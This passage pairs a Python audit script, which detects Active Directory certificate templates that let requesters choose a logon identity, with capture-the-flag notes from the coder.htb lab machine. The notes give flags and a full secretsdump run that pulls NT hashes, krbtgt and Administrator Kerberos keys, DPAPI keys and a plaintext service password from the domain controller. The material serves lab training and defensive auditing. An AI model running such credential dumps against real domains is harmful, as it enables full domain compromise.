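    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}

REQUESTER_CONTROLS_NAME = {
    "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT",
    "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME",
}


def decode_name_flags(value) -> list:
    """Expand the bitmask into flag names; AD stores it as a signed 32-bit integer."""
    value = int(value) & 0xFFFFFFFF
    return [name for bit, name in sorted(NAME_FLAGS.items()) if value & bit]


def audit_template(template: dict) -> list:
    """Report a template that lets the requester choose the identity on a logon-capable cert."""
    flags = set(decode_name_flags(template["msPKI-Certificate-Name-Flag"]))
    ekus = template.get("pKIExtendedKeyUsage") or []
    controls = flags & REQUESTER_CONTROLS_NAME
    logon_capable = not ekus or any(oid in LOGON_EKUS for oid in ekus)  # no EKU = any use
    if controls and logon_capable:
        return [f"{template['name']}: requester sets {', '.join(sorted(controls))} "
                f"on a logon-capable template"]
    return []


def diff_exports(baseline: list, current: list) -> dict:
    """Compare two exports and list templates that appeared or whose name flags changed."""
    before = {t["name"]: t for t in baseline}
    after = {t["name"]: t for t in current}
    added = sorted(set(after) - set(before))
    changed = sorted(n for n in set(before) & set(after)
                     if int(before[n]["msPKI-Certificate-Name-Flag"])
                     != int(after[n]["msPKI-Certificate-Name-Flag"]))
    return {"added": added, "changed": changed}


def run_audit(baseline_text: str, current_text: str) -> dict:
    """Load two JSON exports and return findings for the current one plus the diff."""
    baseline, current = json.loads(baseline_text), json.loads(current_text)
    findings = [f for t in current for f in audit_template(t)]
    return {"findings": findings, "diff": diff_exports(baseline, current)}


# Constructed sample exports (values made up for the demo; 1107296256 = 0x42000000)
BASELINE_JSON = """[
  {"name": "Administrator", "msPKI-Certificate-Name-Flag": 1107296256,
   "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"]},
  {"name": "WebServer", "msPKI-Certificate-Name-Flag": 1,
   "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]}
]"""
CURRENT_JSON = """[
  {"name": "Administrator", "msPKI-Certificate-Name-Flag": 1107296256,
   "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"]},
  {"name": "WebServer", "msPKI-Certificate-Name-Flag": 1,
   "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},
  {"name": "FakeAdmin", "msPKI-Certificate-Name-Flag": 65537,
   "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"]}
]"""

if __name__ == "__main__":
    print(decode_name_flags(65537))
    print(run_audit(BASELINE_JSON, CURRENT_JSON))
```

Run against periodic exports of the Certificate Templates container, the diff surfaces a template published between two snapshots, and the per-template audit explains why it matters; WebServer in the sample also lets the requester supply the subject, but its only EKU is Server Authentication, so it is not reported.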
flags
- user: bfa700491a2df70dc0cd44404f5fd550
- root: 833fa29dd0e4aab2f56bb9800db76bf4
post-loot
> secretsdump.py -k dc01.coder.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x14fde48e78a860a3522e88d90440ae18
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88c80d0cbc1a15acec2a8d26a259b623:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CODER\DC01$:plain_password_hex:53f0ac34015324a16713abf25e37d42e7addac4e18df92bcc463d596d67c58ea888783e86c6ca96e6d8743112eb0526a126db0d71f609264246041b8a419dd167d44f581af8445f9a881f5c456c812148c0e0ff57f7ae29f09fe520f65e815065cf85ee7054e68cf3d08209d7e5c76d5da06d3918578ac22d7ee5e8d4147c4b6f95c94b6a8cfc0fe11f01eae1f6dbd75d84730fd1a46bb50b9fabe03583bfa027da536c09dd073982940e11e81a4cfcd6d35d08525eacd84277ff10f3a6d23eb0127c6e817e64e260776bc8da96fe0957134af0c56a84630b036a80bf4768b85616525d1a49abcb6c3242749e7abc84c
CODER\DC01$:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd6a71ac74108561425992a1ccd8dc2f1b61a5e94
dpapi_userkey:0xe20e4eebc68a5899e9e08c79067891659e5f01cd
[*] NL$KM
0000 D5 26 FB BE 60 59 13 18 25 58 42 70 F9 10 53 05 .&..`Y..%XBp..S.
0010 E2 04 5E 52 61 5F B3 2E CB 8E EF 43 F0 2C 39 AB ..^Ra_.....C.,9.
0020 66 C0 4A 81 EA C8 1D 99 64 44 05 17 16 20 E0 87 f.J.....dD... ..
0030 88 56 AF 5C 57 61 24 70 3D F7 FF 93 EC 59 02 AC .V.\Wa$p=....Y..
NL$KM:d526fbbe6059131825584270f9105305e2045e52615fb32ecb8eef43f02c39ab66c04a81eac81d99644405171620e0878856af5c576124703df7ff93ec5902ac
[*] _SC_TCBuildAgent
CODER\svc_teamcity:SJ3UBHX7Adm0inoXlGyDFG5G
[*] _SC_TeamCity
CODER\svc_teamcity:SJ3UBHX7Adm0inoXlGyDFG5G
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26000ce1f6ca4029ec5d3a95631e797c:::
coder.htb\e.black:1106:aad3b435b51404eeaad3b435b51404ee:e1b96bbb66a073787a3310b5a956200d:::
coder.htb\c.cage:1107:aad3b435b51404eeaad3b435b51404ee:3ab6e9f70dbc0d19623be042d224b993:::
coder.htb\j.briggs:1108:aad3b435b51404eeaad3b435b51404ee:e38976c0b20e3e41e9c62da792115a33:::
coder.htb\l.kang:1109:aad3b435b51404eeaad3b435b51404ee:b8aba4878e4777864b292731ac88b4cd:::
coder.htb\s.blade:1110:aad3b435b51404eeaad3b435b51404ee:4e4a79beed7d042627d0a7b10f5d008a:::
coder.htb\svc_teamcity:5101:aad3b435b51404eeaad3b435b51404ee:4c5a6890e09834a6834dbf7a76bf20cb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:86a6a038ff6058c56a74e2e35008f6b037b8e7bca8c75cc5ee4495f77d0be71e
Administrator:aes128-cts-hmac-sha1-96:6d63b0853502cbbc8c8e40ad8fe88fa3
Administrator:des-cbc-md5:37feabd9d9575785
krbtgt:aes256-cts-hmac-sha1-96:aeb517a1efec8b79479cb1432e734555bc1039bcbd77bcdc39234b37199a70d3
krbtgt:aes128-cts-hmac-sha1-96:2bab4af978e4cee0b58fa1d377d35981
krbtgt:des-cbc-md5:100489b5839798cb
coder.htb\e.black:aes256-cts-hmac-sha1-96:ccb6c47af9a05d91e7610fe396cd8ffcc0e51279a2eee253fab1fb40536a5a85
coder.htb\e.black:aes128-cts-hmac-sha1-96:650ad0d49ab4bcff325a7f2a846d433f
coder.htb\e.black:des-cbc-md5:89290da2c2cd16ec
coder.htb\c.cage:aes256-cts-hmac-sha1-96:ea9cc2144c3106e9325b1ddda16c27c644d9f9b7e95098581ceba19c75d9b296
coder.htb\c.cage:aes128-cts-hmac-sha1-96:2cff13848c9e8d07339a6ab41bf72088
coder.htb\c.cage:des-cbc-md5:fd6d578510df1af1
coder.htb\j.briggs:aes256-cts-hmac-sha1-96:ec3ac8b99094903a3ca006a725dc0867666347efb4baf04d8b2f8b0305ab65ee
coder.htb\j.briggs:aes128-cts-hmac-sha1-96:39050d78545c40645fa889c13200f8f7
coder.htb\j.briggs:des-cbc-md5:7f5286d35def8f15
coder.htb\l.kang:aes256-cts-hmac-sha1-96:d7eb03d2695638c4ba423cd88e22dcdd7c0f6da996e5d6ed3af6c6d7e6c56661
coder.htb\l.kang:aes128-cts-hmac-sha1-96:25ad8331aa0fa2b26e220040b9e55937
coder.htb\l.kang:des-cbc-md5:571a573e61ced640
coder.htb\s.blade:aes256-cts-hmac-sha1-96:ceeab374597121113f3bdee3aab1fed0522506909b2f1ec24dfe36045eb3c252
coder.htb\s.blade:aes128-cts-hmac-sha1-96:69f4cada02748fba948e4c15460add9e
coder.htb\s.blade:des-cbc-md5:26eca8ad9deaada2
coder.htb\svc_teamcity:aes256-cts-hmac-sha1-96:b6c7ed72b4434a89c56295df6b42ca68937702dda15f90f23423e8712abce030
coder.htb\svc_teamcity:aes128-cts-hmac-sha1-96:d6604e2fadb40bbf71708e7b9c9734a7
coder.htb\svc_teamcity:des-cbc-md5:264ab5645ed91c86
DC01$:aes256-cts-hmac-sha1-96:a43b686fdd5f2e576ad834c5b1d4327dd5bdbd3ec579677343a2c6c43c8f1740
DC01$:aes128-cts-hmac-sha1-96:22192237a3cb399c19a6b469dcd1cba8
DC01$:des-cbc-md5:cb9758c162ba4943
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry